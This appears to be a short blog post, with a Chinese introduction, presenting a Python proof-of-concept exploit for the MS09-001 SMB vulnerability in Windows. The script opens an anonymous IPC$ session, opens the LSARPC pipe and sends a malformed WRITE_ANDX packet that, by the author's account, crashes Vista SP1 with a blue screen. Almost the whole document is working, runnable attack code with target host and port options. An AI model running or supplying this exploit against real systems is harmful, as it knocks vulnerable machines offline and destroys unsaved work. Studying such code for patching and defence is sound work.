今天用python写了一个SMB dos的poc,测试vista sp1,
一个包过去立刻蓝屏,不过XP SP2还有点问题。
# MS09-001 SMB DoS vulnerability PoC exploit
# Author : vessial
# http://hi.baidu.com/vessial
# Status:
# [+] tested on Vista SP1: a single packet crashes the system (BSOD); XP SP2 not yet reliable
# WARNING: this is a kernel denial-of-service PoC -- a vulnerable target reboots and loses
#          unsaved state. Run it only against hosts you are authorised to test.
# Reference :http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx
# http://www.milw0rm.com/exploits/6463
import sys

import impacket
from impacket import smb
from impacket import nmb
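# Target defaults from the original PoC (a lab VM); both can be overridden on
# the command line: python poc.py <host> [port].
TARGET_HOST = '192.168.40.129'
TARGET_PORT = 445


def _nt_create_lsarpc(tid):
    """Build the NT_CREATE_ANDX request that opens the ``\\LSARPC`` pipe on tree ``tid``.

    All field values are those of the original PoC. The Data field is written
    as a raw string -- one leading pad byte, ``\\LSARPC`` in UTF-16LE, then a
    NUL terminator -- instead of through SMBNtCreateAndX_Data, so
    FileNameLength (14 = 7 chars * 2 bytes) must be kept in sync with it.
    """
    pkt = smb.NewSMBPacket()
    pkt['Flags1'] = 0x18
    pkt['Flags2'] = 0xc807
    pkt['Tid'] = tid

    nt_create = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
    nt_create['Parameters'] = smb.SMBNtCreateAndX_Parameters()
    nt_create['Parameters']['FileNameLength'] = 14
    nt_create['Parameters']['AndXOffset'] = 0xdede
    nt_create['Parameters']['CreateFlags'] = 0x16
    nt_create['Parameters']['AccessMask'] = 0x2019f
    nt_create['Parameters']['CreateOptions'] = 0x400040
    nt_create['Parameters']['ShareAccess'] = 7
    nt_create['Parameters']['Impersonation'] = 2
    nt_create['Parameters']['Disposition'] = 1
    nt_create['Data'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"
    pkt.addCommand(nt_create)
    return pkt


def _write_andx_trigger(tid, fid):
    """Build the WRITE_ANDX request that crashes a vulnerable server.

    Only 72 bytes of payload are attached, but DataLength and DataOffset
    advertise 0xffff and HighOffset is 0xcccccccc. The inconsistency between
    the advertised and the actual data is what an unpatched server (MS09-001)
    fails to validate; which individual field is decisive is not established
    here -- the values are taken verbatim from the original PoC.
    """
    pkt = smb.NewSMBPacket()
    pkt['Flags1'] = 0x18
    pkt['Flags2'] = 0
    pkt['Tid'] = tid

    payload = "A" * 72
    write_andx = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX)
    pkt.addCommand(write_andx)
    write_andx['Parameters'] = smb.SMBWriteAndX_Parameters()
    write_andx['Parameters']['Fid'] = fid
    write_andx['Parameters']['AndXOffset'] = 0xdede
    write_andx['Parameters']['Offset'] = 0
    write_andx['Parameters']['WriteMode'] = 8
    write_andx['Parameters']['Remaining'] = len(payload)
    write_andx['Parameters']['_reserved'] = -1
    write_andx['Parameters']['DataLength'] = 0xffff
    write_andx['Parameters']['DataOffset'] = 0xffff
    write_andx['Parameters']['HighOffset'] = 0xcccccccc
    write_andx['Data'] = payload
    return pkt


def main(argv=None):
    """Open ``\\LSARPC`` over an anonymous IPC$ session and send the crashing WRITE_ANDX.

    argv[1] overrides the target host and argv[2] the port (defaults:
    TARGET_HOST / TARGET_PORT). Returns 0 once the trigger packet has been
    sent and 1 if the pipe could not be opened (the trigger is then NOT sent,
    instead of silently doing nothing as the original script did). No
    tree-disconnect or logoff follows the trigger: a vulnerable target is
    expected to be down by then, so waiting for a reply could hang.
    """
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if args else TARGET_HOST
    port = int(args[1]) if len(args) > 1 else TARGET_PORT

    conn = smb.SMB('*SMBSERVER', host, None, nmb.TYPE_SERVER, port)
    # Null session (empty user, password and domain). A target that refuses
    # anonymous IPC$ access fails here, before anything is sent to the pipe.
    conn._login('', '', '', 'WORKGROUP')
    tid = conn.tree_connect_andx('\\\\%s\\IPC$' % host)

    conn.sendSMB(_nt_create_lsarpc(tid))
    reply = conn.recvSMB()
    if not reply.isValidAnswer(smb.SMB.SMB_COM_NT_CREATE_ANDX):
        sys.stderr.write('[-] NT_CREATE_ANDX on \\LSARPC failed; trigger not sent\n')
        return 1
    create_resp = smb.SMBCommand(reply['Data'][0])
    fid = smb.SMBNtCreateAndXResponse_Parameters(create_resp['Parameters'])['Fid']

    conn.sendSMB(_write_andx_trigger(tid, fid))
    sys.stderr.write('[+] WRITE_ANDX trigger sent to %s:%d\n' % (host, port))
    return 0


if __name__ == '__main__':
    sys.exit(main())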
[zz]MS09-001 SMB Dos Poc Exploit